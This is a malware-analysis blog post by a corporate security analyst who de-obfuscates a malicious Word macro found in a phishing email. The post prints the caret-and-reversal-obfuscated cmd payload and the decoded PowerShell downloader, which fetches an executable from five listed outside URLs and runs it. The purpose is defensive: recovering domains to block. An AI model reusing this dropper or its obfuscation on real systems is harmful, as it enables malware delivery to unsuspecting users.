Reverse Engineering an Obfuscated Malicious Macro

Spencer Dodd
Jan 8 · 10 min read

Malicious Microsoft Office documents have been a staple of commercial cybersecurity threat actors for some time. The ubiquity of Office in corporate workplaces combined with the effectiveness of phishing and spearphishing make this technique’s attack surface quite large. Identifying and deconstructing these attacks give us insights into offensive capabilities as well as effective defensive strategies.

Recently, one of our users received an email with an attachment that didn’t seem quite right.

Just mildly edited

Luckily it attracted our attention, and I took a look at the attachment in question. It was a Microsoft Word document and, after some inspection, it became clear that it contained a malicious macro. These macros are Visual Basic for Applications (VBA) code snippets designed to perform code execution on the target’s machine. This attack can be triggered if you click through the security warning that pops up in Word when you open a document with macros.

Please don’t

You’ve never done this, right?…right?…Of course you haven’t, but people do, and when a phish is successful we have to determine what the payload was in order to determine any tailored remediation efforts we may have to make.

Usually, these documents contain code that is obfuscated in order to mask its true purpose and make static analysis a difficult process. There are a variety of tools and techniques that can help you figure out the intent of a malicious document ranging from static code analysis to observation in a detonation sandbox. In the interest of making things difficult and maybe learning a thing or two along the way, I reverse engineered this document’s payload by hand to determine its functionality.

Obtaining Macro Source Code

I used the awesome tool olevba, a part of the oletools project, that allows you to query VBA macro source code directly from the malicious file on a *nix system using python. Alternatively you could open the macros manually in Word or LibreOffice without enabling execution. I extracted the streams from the malicious document using the following command:

$ python2 oletools/olevba.py Invoice_No_2804552.doc -c

The -c flag gives us just the source code of the macros without any further analysis

Not exactly the most legible code I’ve ever seen. All of this obfuscation alone can be an indication of malicious intent. Now we get to figure out what it all does.

VBA NOP-fuscation

The first step in figuring out what is actually happening here is removing the no-operations (nops). There are a fair number of them included to obscure the actual functional pieces of code. In VBA, uninitialized variables are treated as an empty string or null depending on the context. Code like the following example will pop calc.exe.

The conditional above the Shell call will not error out even though WsGQFM is not defined anywhere, but instead be interpreted as the following statement:

If null Or 2 Then
tBFjh = "TI"
End If

Which will set the new variable tBFjh to the string “TI”. All of these snippets are included simply to make static analysis of the macro more confusing. The included conditional statements either do not execute, or execute and assign a random string to a random variable that is not referenced again. Here is a simplified version of the malicious source code without those nops:

Identifying that technique alone removes a lot of the noise in this payload. Now, while it’s still not totally clear what is going on yet, we’re getting a semblance of structure. It looks to me like the middle two functions DTqpj and vNBMCjurWlv contain both normal and reversed strings that are concatenated and returned. The bottom function, SjonJLuoL appears to take in a variable and make a call to Shell with that value. However, the AutoOpen logic is still a bit confusing.

Sub AutoOpen() 
SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV)
End Sub

This obfuscation again builds off of VBA ‘s interpretation of uninitialized variables. The only important pieces here are the KeyString calls, integers, and two of the random strings that are defined functions in the code (DTqpj and vNtBMCjurWl). After removing these undefined nops, we get:

Aha! So our AutoOpen passes the value of:

KeyString(67) + KeyString(77) + DTqpj + vNtBMCjurWl

to our executing function SjonJLuoL. So, what does KeyString do? Well according to Microsoft’s Word VBA API documentation it

Returns the key combination string for the specified keys (for example, CTRL+SHIFT+A).

So basically, it is going to translate a given character code to its string representation. In this case, we get C and M.

I’ve renamed functions and variables of the full remaining macro to more accurate purposeful descriptions below:

Now we have quite a bit of structure and execution flow is clear. Our AutoOpen calls our Execute function with the value of concatenated payload. However, we don’t know what the purpose of QrQBzLuD is. It has a value of 0 and is passed along with our command string as a second argument to Shell. Again we turn to the Microsoft Word VBA documentation. The Shell call is defined as follows:

Shell( pathname, [ windowstyle ] )

The optional windowstyle argument is explained as follows:

Optional. Variant (Integer) corresponding to the style of the window in which the program is to be run.

And looking at the options we see that a given value of 0 means that

vbHide 0 Window is hidden and focus is passed to the hidden window

So our command execution will be performed in a hidden window, unbeknownst to the user who so unsanctimoniously enabled macros. Our final VBA payload, fully de-obfuscated, looks like so:

Command Line Payload

Now we’ve arrived at the native Windows shell command execution portion of this payload.

CMd /V^:^ON/C"^s^e^t lN=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^a^er^b^;^ir^j^$^ ^m^etI^-^e^k^ovn^I;)^ir^j^$^ ^,^fB^J^$(^e^l^i^F^d^a^o^ln^wo^D^.^i^w^Y^$^{^yr^t^{)^B^Kj^$ n^i^ ^f^B^J^$(^hc^a^er^o^f;^'^e^x^e^.^'^+^U^t^L^$^+^'^\'+c^i^l^b^u^p^:vne^$^=^ir^j^$^;^'^4^9^3^'^ ^=^ ^U^t^L^$^;)^'^@^'(^t^i^l^p^S^.^'^Q/^ur^.^en^g^i^s^e^dn^a^l^.n^a^m^i^d^.^w^w^w//^:^p^t^t^h@yn/^t^i^.e^l^o^ic^s^iv^e^l^l^ed^on^i^dra^i^g^l^i//^:^p^t^t^h^@^g/^k^u.^oc^.^s^ec^ivr^e^s^k^e^p^sn^i//^:^p^t^t^h^@C/^m^oc^.^l^a^g^o^f^j//^:^p^t^t^h@^XC^s^U/^e^b^.^yn^a^j//^:^p^t^t^h^'^=^B^K^j^$^;^tn^e^i^lC^b^e^W^.^t^eN^ ^tc^e^j^b^o^-^w^en^=^i^w^Y^$^ ^l^l^e^h^sr^e^w^o^p&&^f^or /^L %^p ^in (^3^4^9^;^-^1^;^0)^d^o ^s^e^t ^l^I=!^l^I!!lN:~%^p,1!&&^i^f %^p ^e^q^u ^0 c^a^l^l %^l^I:^~^-^3^5^0%"

To start de-obfuscating this payload we do a little research. I had a hunch that the caret characters were escape characters that would not impact the plaintext they interspersed. According to a quick search, that assumption held true!

The ^ symbol (also called caret or circumflex) is an escape character in Batch script. When it is used, the next character is interpreted as an ordinary character.

So that’s all more nop obfuscation. We can safely remove the carets and not affect the payload. So here we have our payload again, a little closer to plaintext:

CMd /V:ON/C”set lN= }}{hctac};kaerb;irj$ metI-ekovnI;)irj$ ,fBJ$(eliFdaolnwoD.iwY${yrt{)BKj$ ni fBJ$(hcaerof;’exe.’+UtL$+’\’+cilbup:vne$=irj$;’493' = UtL$;)’@’(tilpS.’Q/ur.engisednal.namid.www//:ptth@yn/ti.eloicsivelledonidraigli//:ptth@g/ku.oc.secivreskepsni//:ptth@C/moc.lagofj//:ptth@XCsU/eb.ynaj//:ptth’=BKj$;tneilCbeW.teN tcejbo-wen=iwY$ llehsrewop&&for /L %p in (349;-1;0)do set lI=!lI!!lN:~%p,1!&&if %p equ 0 call %lI:~-350%”

At first glance we can see command flags, some variables being set, confusing squiglys, and llehsrewop(string reversing anyone?). I broke this out into the independent functional steps of the payload so it would be a little more readable.

CMd /V:ON/Cset lN= }}{hctac};kaerb;irj$ metI-ekovnI;)irj$ ,fBJ$(eliFdaolnwoD.iwY${yrt{)BKj$ ni fBJ$(hcaerof;’exe.’+UtL$+’\’+cilbup:vne$=irj$;’493' = UtL$;)’@’(tilpS.’Q/ur.engisednal.namid.www//:ptth@yn/ti.eloicsivelledonidraigli//:ptth@g/ku.oc.secivreskepsni//:ptth@C/moc.lagofj//:ptth@XCsU/eb.ynaj//:ptth’=BKj$;tneilCbeW.teN tcejbo-wen=iwY$ llehsrewop&&for /L %p in (349;-1;0)
do set lI=!lI!!lN:~%p,1! &&
if %p equ 0
call %lI:~-350%

Here we can see some structure that will allow us to break the payload down line by line.

CMd /V:ON/C

To understand this, we look up the two flag meanings

/V:ON Enable delayed environment variable expansion
this allows a FOR loop to specify !variable! instead of %variable%
expanding the variable at execution time instead of at input time.

If /C or /K is specified, then the remainder of the command line is processed as an immediate command in the new shell. Multiple commands separated by the command separator ‘&’ or ‘&&’ are accepted if surrounded by quotes.

So the /V:ON flag allows us to perform dynamic variable assignment while the command is running (string reversing anyone?) and the /C flag allows us to wrap our multi-step payload in quotes and execute each step delimited by & or &&. Cool. Let’s look at each step of the payload as delimited by &&. Here is the first step of the payload:

set lN= }}{hctac};kaerb;irj$ metI-ekovnI;)irj$ ,fBJ$(eliFdaolnwoD.iwY${yrt{)BKj$ ni fBJ$(hcaerof;’exe.’+UtL$+’\’+cilbup:vne$=irj$;’493' = UtL$;)’@’(tilpS.’Q/ur.engisednal.namid.www//:ptth@yn/ti.eloicsivelledonidraigli//:ptth@g/ku.oc.secivreskepsni//:ptth@C/moc.lagofj//:ptth@XCsU/eb.ynaj//:ptth’=BKj$;tneilCbeW.teN tcejbo-wen=iwY$ llehsrewop

This assigns a variable lN to the value of this large reversed string that appears to be in powershell and involve some URLs.

for /L %p in (349;-1;0)

FOR /L — Loop through a range of numbers

This for loop runs through integers 349 to 0, stepping backwards each iteration.

do set lI =!lI!!lN:~%p,1!

This step looks confusing as someone who doesn’t do any batch coding, but is easier if you separate it a little like this:

do set lI = !lI! !lN:~%p,1!

This is where the /V:ON flag comes in handy, as it allows us to perform variable expansion each time the line is reached as opposed to a single time when the command is called.

Variable expansion means replace a variable enclosed in % or ! by its value.
The %normal% expansion happen just once, before a line is executed. This means that a %variable% expansion have the same value no matters if the line is executed several times (like in a for command). The !delayed! expansion is performed each time that the line is executed.

In this line, lI is set to the current value of lI plus the substring
of the current value of lN at index %p of a size of 1 character. Or, more simply in a pythonic representation:

for p in range(349, 0, -1):
lI = lI + lN[p]

So in this case, lI is going to be the properly formatted string, and we are iterating through lN and putting its characters in reverse order into lI.

if %p equ 0
call %lI:~-350%

Then, if we’ve finished reversing the string, we call the last 350 characters of the newly reversed string lI as a shell command. After running through the loop, the variable lI will contain the following string:

powershell $Ywi=new-object Net.WebClient;$jKB=’http://jany.be/UsCX@http://jfogal.com/C@http://inspekservices.co.uk/g@http://ilgiardinodellevisciole.it/ny@http://www.diman.landesigne.ru/Q'.Split('@');$LtU = ‘394’;$jri=$env:public+’\’+$LtU+’.exe’;foreach($JBf in $jKB){try{$Ywi.DownloadFile($JBf, $jri);Invoke-Item $jri;break;}catch{}} 

which is then executed.

Powershell Payload

Now you must be thinking what I’m thinking at this point, which is

are we done yet??

The answer is, yea pretty much. Here is this payload formatted a little more nicely for the eyes:

So we loop through the @ delimited URIs attempting to download a file.
When we successfully download from one of the paths, we write the download to $env:public+’\’+$LtU+’.exe’, execute it, and break out of the loop. Here is the final payload most simply:

Postmortem

We officially made it from executable gibberish to block-able second-stage domains! While this was fun and a great learning experience, this is not the most optimal way to figure out this information. In the time it took to reverse this payload, the second-stage domains were already dead. A good dynamic analysis sandbox is the way to go for these, as they can get you the macro contents along with the raw payload executed and sometimes relevant second-stage payload heuristics.

Given that we know the document is malicious and doesn’t contain any sensitive company information, we can upload the document to VirusTotal. VirusTotal does a number of cool things including running samples through an array of antiviral detection engines and reporting static and sometimes heuristic data on the samples. In the case of malicious documents, it can also extract the VBA macro streams. Be aware though when uploading documents to VirusTotal, that when the document is uploaded, the information in it should be considered in the public domain. So be careful with uploading company documents that are suspected of being malicious that you have not manually analyzed with tools like oletools locally.

The VirusTotal results for the dissected sample (9d0e185ad2ed2ee4cd332294a17b534987b969c44931b49cdbcbfc329ea63f22) can be found here. At this point, it has pretty good detection:

Definitely enable macros

Additionally, if you go to the Behavior tab and select Tencent’s sandbox, it has done a pretty nice job of capturing the commands executed on the system

While the commands are truncated in this output, we can see most of our powershell command and all the relevant domains to be blocked. It also caught the exe that was dropped to disk

Sandboxes can save a lot of time! I don’t believe this sandbox analysis is performed for every sample uploaded to VT, but if you want you can build your own malware analysis sandbox. Cuckoo Sandbox is a free open-source way to get started.

I hope you enjoyed this write-up. If you thought this was interesting and want to join a team that works on building and securing modern eCommerce infrastructure, check out our open security roles here!


               Spencer Dodd - Walmart Information Security
spencer.dodd@jet.com
link to my github

Acknowledgments

Harold Ogden of the Dynamic Defense Engineering Team at Walmart, Eric Goldman of Jet Security, Walmart Information Security, and Jet Information Security

Thanks to James Novino

Spencer Dodd

Written by

adventures in infosec

WalmartLabs

Using technology, data and design to change the way the world shops. Learn more about us - http://walmartlabs.com/

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade